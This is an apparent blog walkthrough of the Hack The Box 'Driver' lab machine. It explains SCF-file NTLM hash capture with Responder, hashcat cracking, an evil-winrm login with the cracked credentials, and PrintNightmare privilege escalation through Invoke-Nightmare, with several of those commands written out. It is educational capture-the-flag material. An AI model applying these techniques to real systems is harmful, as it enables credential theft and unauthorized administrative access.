HTB - Driver


----------------------------------------------------------

This document is for educational purposes only, I take no responsibility for other people’s actions. This is a review of Driver a vulnerable VM from https://www.hackthebox.com.

----------------------------------------------------------

This is one of my favorite machines! I did it while it was still active so I had to hold off on publishing my walk-through for a bit, but here it is!


Once we power the machine on, we do an Nmap scan to see what we have to work with.



From our scan we can see that port 445 for SMB is up and running, this means that we have an active share that we could possibly explore. An active share is like a folder that can be accessed over a network. Let's see if I can just log in anonymously.


No such luck. Okay, well there's something on port 80, let's take a look at it.

This is the prompt I get when I type in the IP address into my browser bar.


Okay... this message gives us some key information. First, it let's us know that there is a user named 'admin', next it tells us the name of the system, 'MFP Firmware Update Center'. The first thing I'm going to do is look for default credentials for this system. A quick duckduckgo search gives us this page:

https://support.hp.com/us-en/document/c05511827

This is a KB article for the HP LaserJet MFP M436. Looks like we're dealing with a printer...

Scrolling through the KB we hit on this:


Okay, let's try it!

Looks like the default credentials got us into this thing!

Now we have to find something that's going to allow us to escalate our privilege further. When I click on the 'Firmware Updates" tab, I get the option to upload a file... Maybe I could use this to get a reverse shell somehow?


I toy around with a few ideas. Then I start seriously considering a SMB Share - SCF File attack. Here's a blog post where you can read up on it:



So I'll give you the short and sweet of it:
We can use the SMB Share - SCF File Attack to obtain password hashes of domain users via an SMB share. We know that there is an SMB share up and running, we just can't log into it because we don't know the username or password.

So, how do we go about gathering these hashes? We are going to do with with a SCF or "Shell Command File". 

A SCF is a Windows Explorer command file that can be used to launch commands by Windows Explorer and they have been used by attackers to steal credentials. Simply by accessing a folder containing a malicious SCF file, a user will unwittingly share his computer's login credentials with an attacker via Google Chrome and the SMB protocol. In a 2015 BlackHat presentation Stankovic created a SCF file that loads its icon image from an URL, at which end he had an SMB server. This means that whenever the user's computer tried to load that icon from the SMB server, the server asked for and received the user's login credentials, the user's computer was thinking that it needed to authenticate.

The problem is that these SMB requests take place even if the user wants them to or not. The Windows OS is built to load file icons whenever the user navigates to a folder, NO QUESTIONS ASKED, no user interaction needed! So, when the user has navigated to a folder containing a malicious SCF file, in milliseconds, the OS will read the SCF file, and make a request to the remote SMB server, and give away the user's credentials in the form of a NTLMv2, NTLMv1, or LM password hash, depending ont he user's OS version.

So we have the ability to upload files to the machine. That means as long as they are not blocking outbound SMB requests with a firewall, we can get their system to query my "remote SMB server".

Let's go ahead and craft the Shell Command File (SCF) like this:



Okay, but it's important to rename it before we upload it. And we have save it with the '@' symbol in the front of the file name, because this will place the exploit file at the top of the victim's share drive and ensure that it gets executed. So We are going to rename it '@exploit.scf'.

Now all we need to do is set up responder to capture the traffic and we'll get out hash. Responder is a tool that comes with Parrot and Kali for link-local multicast resolution (LLMNR) and NetBIOS Name Service (NBT-NS) that responds to specific NetBIOS queries on the file server request. When we go back to the web interface and upload our file. As soon as we do we see action!


So we've got a NTLMv2 hash from a user named Tony.

Here's a cool little hint. If you ever want to know what mode you need to crack a hash in hashcat, just use hashid with the (-m) flag set and it will tell you.


As you can see the hascat mode we need to crack this particular hash is 5600. So let's run it through hashcat with the rockyou.txt list. This is goign to be the command we use:
$ hashcat -a 0 -m 5600 /hash-file /rockyou.txt

After a while we get a hit!


Sweet. Liltony. Nice one Tony. Now we can take that username and password combo and log into the SMB share.

Okay, we're in. Now let's try and snoop around the ADMIN$ share... Nope. C$? ... Nope. Well maybe IPC$?! Finally, we got access to something.



So, we can use Tony's credentials to log into the IPC$ share. This is the inter-process communication share. Its used for inter-process communication via named pipes and is not part of the file system. So this isn't going to be very useful.

After awhile I give up and go back to my Nmap scan to look for some other clues. If you recall port 5985 was open. I decide to look into it a little. I learn a little something that might prove to be very valuable.


This port is used for Windows Remote Management. Is there a way to log into the machine remotely using the stolen credentials? Evil-winrm to the rescue! It's an easy to install and easy to download tool. You can get it from here:
https://github.com/Hackplayers/evil-winrm

Once its installed we just log in with this command:
$./evil-winrm.rb -i 10.10.11.106 -u tony -p liltony


Nice! We're finally in! We can recover the first flag from the user Tony's desktop. Getting admin privileges will be harder though.

We are going to do some basic enumeration of the system with winPEAS. To do this we'll need to upload the privilege escalation script and we can do that with EvilWinRM's built-in file uploader. You can get a good idea of how to do it on the github page for the evil-winrm tool. It's basically as simpel as typing in 'upload' and then the path to the file you want to upload on your local computer.


Now that we've uploaded our script onto the victim machine we'll execute it.




After parsing through the report I got from running winPEAS I spot something interesting. I can see at the bottom of the report what kind of driver they're using. Now, we know that this box is called 'Driver' and it was released around the time the whole Driver Nightmare was a big problem (and it still is), maybe this driver is vulnerable?

So let's do a duck search for it.
We get this:


It looks like many of these Richo drivers have a local privilege escalation vulnerability in them. That's just what we're looking for!


Going back to our report we can see that there is a spoolsv service running on the local computer. If we search for spoolsv vulnerability we'll find this:


We can see that this article is talking about CVE-2021-34527. We can see that this is part of the PrintNightmare vulnerability.

More research into PrintNightmare gets me to this link:


Reading this interesting article gives me some info: the vulnerability itself allows a low level authenticated user to be able to add a printer, and specifically provide a driver for that printer. The process checks that the user is authenticated and then grants them SYSTEM LEVEL access to install drivers on the printer.
This means that with a low privileged shell on a Windows box, or with valid credentials remotely, an attacker can get SYSTEM privileges on a host.

According to the above page, there is a really good exploit, called Invoke-Nightmare LPE. This is a PowerShell script developed by Caleb Stewart and John Hammond. It exploits CVBE-2021-1675, which is a critical remote code execution and local privilege  escalation vulnerability dubbed "PrinterNightmare". This is a pure PowerShell implementation.
We can get it from here:



According to Caleb Stewarts Github page, where the exploit is located, its usage is pretty straight forward.
Once the script is on the system do the following.
Import-Module .\cve-2021-1676.ps1 (This will import the module).
Invoke-Nightmare -NewUser "user" -NewPassword "password", and that's basically it. Easy huh?

Okay we download it off of the github repository, now we have to get it on the machine.


Nice! I uploaded it. But when I try to run it I get this error:


It says "running scripts is disabled on this system". A little research gives us a solution.
All we have to do is force execution policy to an Unrestricted state:


With that out of the way, let's follow the instructions from the GitHub page that I described before:


It works like a charm! Looks like we made a new user with admin privileges. Let's log in as them!
We log in with our new credentials:


And soon enough the root flag is ours!



I'm really happy that I was able to share this walkthrough with you.  This is one of my FAVORITE boxes. I love the combination of different vulnerabilities that weave themselves together to make a great adventure! Hope you enjoyed it!
Subscribe to: Comments (Atom)

Welcome

Welcome to my InfoSec and IT Blog! My name is Sean, and this is my blog where I write about one of my favorite topics: information security ...

  • Welcome
    Welcome to my InfoSec and IT Blog! My name is Sean, and this is my blog where I write about one of my favorite topics: information security ...